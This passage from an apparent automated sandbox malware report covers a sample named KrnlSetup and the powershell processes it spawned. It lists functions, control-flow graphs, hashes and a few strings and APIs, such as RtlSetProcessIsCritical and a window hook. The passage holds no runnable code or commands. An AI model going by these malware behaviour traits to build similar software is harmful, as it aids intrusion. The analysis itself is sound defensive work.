                                                                                • Opcode Fuzzy Hash: f16b226badfc56195a18ae1a65e2889d3a77169e4ffb4a79a734b87075dd68b1
                                                                                • Instruction Fuzzy Hash: 4C023170A0AA1D8FDBA8DF58D8A4BA877F1FF59311F5101B9D04DD32A1CA34A985CF41
                                                                                Function 00007FFD9B787342 Relevance: 1.7, Strings: 1, Instructions: 459COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 806 7ffd9b787342-7ffd9b78734f 807 7ffd9b787351-7ffd9b787359 806->807 808 7ffd9b78735a-7ffd9b787427 806->808 807->808 811 7ffd9b787493 808->811 812 7ffd9b787429-7ffd9b787432 808->812 813 7ffd9b787495-7ffd9b7874ba 811->813 812->811 814 7ffd9b787434-7ffd9b787440 812->814 821 7ffd9b7874bc-7ffd9b7874c5 813->821 822 7ffd9b787526 813->822 815 7ffd9b787442-7ffd9b787454 814->815 816 7ffd9b787479-7ffd9b787491 814->816 817 7ffd9b787458-7ffd9b78746b 815->817 818 7ffd9b787456 815->818 816->813 817->817 820 7ffd9b78746d-7ffd9b787475 817->820 818->817 820->816 821->822 824 7ffd9b7874c7-7ffd9b7874d3 821->824 823 7ffd9b787528-7ffd9b78754d 822->823 830 7ffd9b78754f-7ffd9b787559 823->830 831 7ffd9b7875bb 823->831 825 7ffd9b78750c-7ffd9b787524 824->825 826 7ffd9b7874d5-7ffd9b7874e7 824->826 825->823 828 7ffd9b7874eb-7ffd9b7874fe 826->828 829 7ffd9b7874e9 826->829 828->828 832 7ffd9b787500-7ffd9b787508 828->832 829->828 830->831 833 7ffd9b78755b-7ffd9b787568 830->833 834 7ffd9b7875bd-7ffd9b7875eb 831->834 832->825 835 7ffd9b7875a1-7ffd9b7875b9 833->835 836 7ffd9b78756a-7ffd9b78757c 833->836 841 7ffd9b7875ed-7ffd9b7875f8 834->841 842 7ffd9b78765b 834->842 835->834 837 7ffd9b787580-7ffd9b787593 836->837 838 7ffd9b78757e 836->838 837->837 840 7ffd9b787595-7ffd9b78759d 837->840 838->837 840->835 841->842 844 7ffd9b7875fa-7ffd9b787608 841->844 843 7ffd9b78765d-7ffd9b787735 842->843 854 7ffd9b78773b-7ffd9b78774a 843->854 845 7ffd9b787641-7ffd9b787659 844->845 846 7ffd9b78760a-7ffd9b78761c 844->846 845->843 847 7ffd9b787620-7ffd9b787633 846->847 848 7ffd9b78761e 846->848 847->847 850 7ffd9b787635-7ffd9b78763d 847->850 848->847 850->845 855 7ffd9b787752-7ffd9b7877b4 call 7ffd9b7877d0 854->855 856 7ffd9b78774c 854->856 863 7ffd9b7877bb-7ffd9b7877cf 855->863 864 7ffd9b7877b6 855->864 856->855 864->863
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: U
                                                                                • API String ID: 0-3372436214
                                                                                • Opcode ID: e2e3e85ab044fbbdc47d99609f9b1624818b93f95e9e91638edf8b8b9d99ec96
                                                                                • Instruction ID: c03b20e96b34606190dc39399b53fc77fddf2f224fa11ef998a7ad9e06aa0202
                                                                                • Opcode Fuzzy Hash: e2e3e85ab044fbbdc47d99609f9b1624818b93f95e9e91638edf8b8b9d99ec96
                                                                                • Instruction Fuzzy Hash: F0E1C430A09A4E4FEBA8DF28C8A57E977D1FF54311F04426ED85EC72A5CF74A9418781
                                                                                Function 00007FFD9B782461 Relevance: 1.6, Strings: 1, Instructions: 384COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: U
                                                                                • API String ID: 0-3372436214
                                                                                • Opcode ID: ad7dbf12b7d618b382830d76d4a04463a1765c3c0e5c3283a8233199238bac01
                                                                                • Instruction ID: 071e2368c8b584dddcd913a3c342c08dc1eb41e2dc009b17dffd0ea609c9a984
                                                                                • Opcode Fuzzy Hash: ad7dbf12b7d618b382830d76d4a04463a1765c3c0e5c3283a8233199238bac01
                                                                                • Instruction Fuzzy Hash: A5C1B760B1DE094FEB98EBB844B56BD77D2EF98302F054279E05EC32E6DE38A9414741
                                                                                Function 00007FFD9B7821C1 Relevance: 1.5, Strings: 1, Instructions: 203COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1036 7ffd9b7821c1-7ffd9b7821cd 1037 7ffd9b7821d0-7ffd9b7821e1 1036->1037 1038 7ffd9b7821cf 1036->1038 1039 7ffd9b7821e4-7ffd9b7821f5 1037->1039 1040 7ffd9b7821e3 1037->1040 1038->1037 1041 7ffd9b7821f8-7ffd9b782209 1039->1041 1042 7ffd9b7821f7 1039->1042 1040->1039 1043 7ffd9b78220c-7ffd9b78221d 1041->1043 1044 7ffd9b78220b 1041->1044 1042->1041 1045 7ffd9b782220-7ffd9b782231 1043->1045 1046 7ffd9b78221f 1043->1046 1044->1043 1047 7ffd9b782234-7ffd9b782245 1045->1047 1048 7ffd9b782233 1045->1048 1046->1045 1049 7ffd9b782248-7ffd9b782330 1047->1049 1050 7ffd9b782247 1047->1050 1048->1047 1064 7ffd9b78233a-7ffd9b78233b 1049->1064 1050->1049 1065 7ffd9b782342-7ffd9b78235e 1064->1065 1067 7ffd9b782360-7ffd9b782363 1065->1067 1068 7ffd9b78236c-7ffd9b78238f 1067->1068
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: A
                                                                                • API String ID: 0-3554254475
                                                                                • Opcode ID: 1e103471ba372e569b55485358f7cbe7f3b51a045b9203d3038600d43aef4d14
                                                                                • Instruction ID: 0785f05abad2dc93e13a8f6e8badc5477120f01f804e530899875e2965e6f1ee
                                                                                • Opcode Fuzzy Hash: 1e103471ba372e569b55485358f7cbe7f3b51a045b9203d3038600d43aef4d14
                                                                                • Instruction Fuzzy Hash: 85510E10B1EAC90FD796ABB808B46657FD4DF8722AB0901FBE09DC71E7DD281906C342
                                                                                Function 00007FFD9B790814 Relevance: 1.0, Instructions: 969COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0afdfddcfdde6fd8f4b82712e143d3a8b627129f9837de94a722314dd956f724
                                                                                • Instruction ID: f06fe0ccba03d2758aba7323405beb46aa5235ddcb97bee0cd8671921e7917a8
                                                                                • Opcode Fuzzy Hash: 0afdfddcfdde6fd8f4b82712e143d3a8b627129f9837de94a722314dd956f724
                                                                                • Instruction Fuzzy Hash: AA628434F1DA0D4FEBA8FBB884A5A7D72D2EF98310B514674D41DD32E6DE28E9428740
                                                                                Function 00007FFD9B786596 Relevance: .5, Instructions: 470COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 572f377305c2b4321934e266aba69add0044ef907fc6e46b8cd0077d490483ee
                                                                                • Instruction ID: c4f1ed2b42a696114be00df06f157fd642ae06b47239bb27db890881ffaee48d
                                                                                • Opcode Fuzzy Hash: 572f377305c2b4321934e266aba69add0044ef907fc6e46b8cd0077d490483ee
                                                                                • Instruction Fuzzy Hash: 53F1B630609A4D8FEBA8DF28D8957E937D1FF54301F04426EE85DC72A5DB34E9418B81
                                                                                Function 00007FFD9B7933FC Relevance: .2, Instructions: 174COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3e6383324e35554e62c352dc8a7bd2b1b034d8de82532635eb76dbec419256eb
                                                                                • Instruction ID: 14056164c2744b2a0700acecbaf2cc7bc3493f69fe40b373c05e70964531e6f6
                                                                                • Opcode Fuzzy Hash: 3e6383324e35554e62c352dc8a7bd2b1b034d8de82532635eb76dbec419256eb
                                                                                • Instruction Fuzzy Hash: 9F51CA70E18A0D8FDB98EFA8D495AACB7F1FF59305F111169D41DE72A1CB34A981CB40
                                                                                Function 00007FFD9B78EB60 Relevance: .2, Instructions: 160COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 724bc6aedc04ff5d0f8223eddfa39ba1984c5fa2b583335694ae6e9c67787d43
                                                                                • Instruction ID: ec8f60e80453194b111a4f4797a102d5f8a4f96d2ea7a73ba8421a668951fb86
                                                                                • Opcode Fuzzy Hash: 724bc6aedc04ff5d0f8223eddfa39ba1984c5fa2b583335694ae6e9c67787d43
                                                                                • Instruction Fuzzy Hash: 6A51E834E0961D8ADBB9EBA4C8646FDB3B1FF59301F110679D01DE32A5CE356A41CB40
                                                                                Function 00007FFD9B78BF18 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 137COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID: HookWindows
                                                                                • String ID: U
                                                                                • API String ID: 2559412058-3372436214
                                                                                • Opcode ID: d95ad969d568710ec4a241daa3d8d151d88afccf70022bc2eeb93e300c114f96
                                                                                • Instruction ID: 432544b367f4ae32e852c8aded3329464ef1ad82d13079be58bc26d319dd92f6
                                                                                • Opcode Fuzzy Hash: d95ad969d568710ec4a241daa3d8d151d88afccf70022bc2eeb93e300c114f96
                                                                                • Instruction Fuzzy Hash: DB310630A1CA5D4FDB18DB6898566F9BBE1EB59321F00427ED05DC3292DE75A8128BC1
                                                                                Function 00007FFD9B78B75D Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 865 7ffd9b78b75d-7ffd9b78b840 RtlSetProcessIsCritical 869 7ffd9b78b848-7ffd9b78b87d 865->869 870 7ffd9b78b842 865->870 870->869
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalProcess
                                                                                • String ID:
                                                                                • API String ID: 2695349919-0
                                                                                • Opcode ID: 6c76c5119c1d4d31ac04276690eb69eca1e45bb9444ceafa3524db2544e5c8c2
                                                                                • Instruction ID: 62fc05def57507ce40086a306432ef2797e52d210626c9cda6fde2f090505960
                                                                                • Opcode Fuzzy Hash: 6c76c5119c1d4d31ac04276690eb69eca1e45bb9444ceafa3524db2544e5c8c2
                                                                                • Instruction Fuzzy Hash: 9941F43190C7588FDB19DFA8D855AE9BBF0FF56311F04416EE08AC3692CB746846CB91
                                                                                Function 00007FFD9B787C50 Relevance: 1.6, APIs: 1, Instructions: 87COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 14ca80640a43f24038673011a57b44abaf785de174ab7f64926646fb01938460
                                                                                • Instruction ID: dba1b73c11a4e330f74b700fc18fde56d8ebca2fa14ca4c847f8a3392fff1382
                                                                                • Opcode Fuzzy Hash: 14ca80640a43f24038673011a57b44abaf785de174ab7f64926646fb01938460
                                                                                • Instruction Fuzzy Hash: 34212031D0D74D9FEB65DBA894863E87BE0FF01322F15427AD45AC30E2CA38A5568751

                                                                                Non-executed Functions

                                                                                Function 00007FFD9B781040 Relevance: .2, Instructions: 222COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 42834c271967b30959e8a37bf70810d6027de2251111677fa82de57c593c8eac
                                                                                • Instruction ID: 75a9812f11ae98e1e81d30333148b891927445acebcb07fab3bab8c213fe2e6f
                                                                                • Opcode Fuzzy Hash: 42834c271967b30959e8a37bf70810d6027de2251111677fa82de57c593c8eac
                                                                                • Instruction Fuzzy Hash: 5651671BF0E56A09E72576FCB9659FD7B10DF96332F0443B7E54D890E78E08200A8AD1

                                                                                Executed Functions

                                                                                Function 00007FFD9B65E380 Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1784564912.00007FFD9B65D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B65D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffd9b65d000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 6~ca
                                                                                • API String ID: 0-3725481105
                                                                                • Opcode ID: 325a37a132b00859a91e9b0148a8281d4730f971419205ca93703e0302751fda
                                                                                • Instruction ID: b1ee88a1aca96b33ed208f13d293e91d7b1bf86bcccee8965394920bb751d6ab
                                                                                • Opcode Fuzzy Hash: 325a37a132b00859a91e9b0148a8281d4730f971419205ca93703e0302751fda
                                                                                • Instruction Fuzzy Hash: 9941057150EBC44FEB668B6898519523FF0EF56314B1605EFD0C8CF1A3D625B846C792
                                                                                Function 00007FFD9B77644D Relevance: .7, Instructions: 719COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1784955588.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffd9b770000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cffd7597af7eb25ee3222055bd24ece76451836ecffe996493434602c46b702a
                                                                                • Instruction ID: 8cde08219a64f1d32359a2393b7f63c2bc95e761babe0216ede64e2375485e2e
                                                                                • Opcode Fuzzy Hash: cffd7597af7eb25ee3222055bd24ece76451836ecffe996493434602c46b702a
                                                                                • Instruction Fuzzy Hash: E2D17531A18A4D8FDF94DF5CC495AAD7BF1FF68300F1542AAD409D72A9CA74E841CB81
                                                                                Function 00007FFD9B84660A Relevance: .4, Instructions: 430COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1785472496.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffd9b840000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d4ee085e9a003295154f5ec3d88201d1a7abd1c9bf7809088144248e51ceb073
                                                                                • Instruction ID: e106641ca6839263c0fb31943aa9fa3d91c658247a9366f50177b98824c97747
                                                                                • Opcode Fuzzy Hash: d4ee085e9a003295154f5ec3d88201d1a7abd1c9bf7809088144248e51ceb073
                                                                                • Instruction Fuzzy Hash: 2BD146B2B0EA8E4FEBA5AB6848745B57BE2EF1D314B0901FED45DC70E3D918A805C341
                                                                                Function 00007FFD9B84664D Relevance: .3, Instructions: 251COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1785472496.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffd9b840000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9941bda7c109a324e3fea8e41f58c2309582b92f0669562eb182035f098a59e3
                                                                                • Instruction ID: faebd57f8490eee62041f42ec2aa6be8ccd9e031355d2c6f9a9d2f52021b3238
                                                                                • Opcode Fuzzy Hash: 9941bda7c109a324e3fea8e41f58c2309582b92f0669562eb182035f098a59e3
                                                                                • Instruction Fuzzy Hash: B581DEA2F0FA8A4FEBB59BA844745787BD2EF1D314B1A01FED459CB1E7D918AC048301
                                                                                Function 00007FFD9B779F65 Relevance: .2, Instructions: 216COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1784955588.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffd9b770000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 27985d7170f739327fd1881321031a7a83fdf888bc4c1b64cd98d139ac23fd9c
                                                                                • Instruction ID: ec8a49d8cece5a5f33231d5475ca53eca79376d75680d2ae68820537995f24c9
                                                                                • Opcode Fuzzy Hash: 27985d7170f739327fd1881321031a7a83fdf888bc4c1b64cd98d139ac23fd9c
                                                                                • Instruction Fuzzy Hash: 3C513D67A0B79E1FE7125B9CA8F64F93B50EF52628B0903F3D0D84B0B3FD4925568681
                                                                                Function 00007FFD9B779748 Relevance: .1, Instructions: 135COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1784955588.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffd9b770000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 35a9e7b8d4fcfa539f11f559bfab4342bc78d0feac74b8cc57aee4afd2f68d03
                                                                                • Instruction ID: c1c03d358e27738a254e6472c512f38d1abc38cafa61283589ceee0f9938a3be
                                                                                • Opcode Fuzzy Hash: 35a9e7b8d4fcfa539f11f559bfab4342bc78d0feac74b8cc57aee4afd2f68d03
                                                                                • Instruction Fuzzy Hash: A5411871A0DB8C9FDB18DF5C984A6B9BBE0FB94710F00426FE459D3292DA70A85587C2
                                                                                Function 00007FFD9B77A47C Relevance: .1, Instructions: 102COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1784955588.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffd9b770000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: decf7086e7e382ad8bd7d08671f40fd2743b2d164d73facb4198916f9ea42ebb
                                                                                • Instruction ID: 7e477c750e9f3b957ce081dbe5b05dfcec6acff2c09efd364079b39be6d2d15a
                                                                                • Opcode Fuzzy Hash: decf7086e7e382ad8bd7d08671f40fd2743b2d164d73facb4198916f9ea42ebb
                                                                                • Instruction Fuzzy Hash: DE210C3190C74C8FEB59DBAC988A7E97FF0EB96321F04426FD048C3166DA749456CB91
                                                                                Function 00007FFD9B7733B5 Relevance: .0, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1784955588.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffd9b770000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                • Instruction ID: a855e341a462274d49eabc0e16f816d0981cb0317f9cc1d8a1f2f3ba92cc05e1
                                                                                • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                • Instruction Fuzzy Hash: EA01A73020CB0C4FD748EF0CE051AA5B3E0FB85320F10056DE58EC36A1DA32E882CB41
                                                                                Function 00007FFD9B84414D Relevance: .0, Instructions: 37COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1785472496.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffd9b840000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8d61e211b484e3819ee25442062fd3b0e587730d3c455283af6f0f3270ca274d
                                                                                • Instruction ID: c1de2499a4879d287196033eb93758809c7c04b9fe83aac8f2df12c5a1a5a49a
                                                                                • Opcode Fuzzy Hash: 8d61e211b484e3819ee25442062fd3b0e587730d3c455283af6f0f3270ca274d
                                                                                • Instruction Fuzzy Hash: C4F09A32B0E9098FD768EB4CE4518A8B3E1EF5932072600BAE06DC71B3CA25EC408780
                                                                                Function 00007FFD9B844400 Relevance: .0, Instructions: 35COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1785472496.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffd9b840000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a38347014c53e7b900e8d0ff22d939ecb6c8c65e1f7b3fc898b5cf875cd18784
                                                                                • Instruction ID: 95fcc9729cec54b0f89309f63a5c0766168dad134372329cc680b0485ebb1abe
                                                                                • Opcode Fuzzy Hash: a38347014c53e7b900e8d0ff22d939ecb6c8c65e1f7b3fc898b5cf875cd18784
                                                                                • Instruction Fuzzy Hash: 98F05E32B0E5498FD764EB5CE4658A8B7E0FF4932475600BAE15DC74A3DA25AC44C790
                                                                                Function 00007FFD9B8441D1 Relevance: .0, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1785472496.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffd9b840000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                • Instruction ID: cdab32a5d8804fbfaa35fd86f79cc5e0cbc80fc2a89f23c2f1827656015b2d24
                                                                                • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                • Instruction Fuzzy Hash: 52E01A31B0C8088FDA78DB4CE0519A973E2EB9D32171601BBD14EC7571CA22ED518B80

                                                                                Non-executed Functions

                                                                                Function 00007FFD9B778B69 Relevance: 6.4, Strings: 5, Instructions: 156COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1784955588.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffd9b770000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: M_^7$M_^8$M_^?$M_^@$M_^F
                                                                                • API String ID: 0-3108979760
                                                                                • Opcode ID: 3ef853b186a24f72beeb0730edc14bcf747cee64d1d5d5914805d88cc51cbb60
                                                                                • Instruction ID: cbac0d32710b5d077d52c89923c29d7f8667db912d442497e752d05bcd676dd5
                                                                                • Opcode Fuzzy Hash: 3ef853b186a24f72beeb0730edc14bcf747cee64d1d5d5914805d88cc51cbb60
                                                                                • Instruction Fuzzy Hash: 6441036B70842A8DD3053A7DB8209FD7751DFA423978903F6E0A9CB0D3BD15708A8AC4
                                                                                Function 00007FFD9B7789FA Relevance: 5.1, Strings: 4, Instructions: 99COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1784955588.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffd9b770000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: M_^$M_^$M_^$M_^
                                                                                • API String ID: 0-1397233021
                                                                                • Opcode ID: 02e2e0b1ea17c21aa1aa3ff27b1eb9c40fe6ffa8763d49c4f57750e9d385af0c
                                                                                • Instruction ID: 1d914b6971f05cab18780df36f254c6ddff615c21b1588ad91f0bd90ea71a829
                                                                                • Opcode Fuzzy Hash: 02e2e0b1ea17c21aa1aa3ff27b1eb9c40fe6ffa8763d49c4f57750e9d385af0c
                                                                                • Instruction Fuzzy Hash: EE318193B0FBD65BE367066A88B90A47FA0EF52758B0B03F6C0D84B5A3BC5925438241

                                                                                Executed Functions

                                                                                Function 00007FFD9B83660A Relevance: 2.9, Strings: 2, Instructions: 443COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1898062380.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd9b830000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: U$X7k
                                                                                • API String ID: 0-2576589798
                                                                                • Opcode ID: 49d95ff0ffe6943017c4336de3bd1ec023ffe4856b72b4baee02d3e0183661c9
                                                                                • Instruction ID: 232abede7ffdac69a85fa1a6907f088605250ccced81531d0c62e9d58927cc72
                                                                                • Opcode Fuzzy Hash: 49d95ff0ffe6943017c4336de3bd1ec023ffe4856b72b4baee02d3e0183661c9
                                                                                • Instruction Fuzzy Hash: 0AD16A72B0E68E4FEB699B6C88745B57BD0EF19314B1901FED45DC71E3D918A8058341
                                                                                Function 00007FFD9B769750 Relevance: .1, Instructions: 146COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1897454819.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
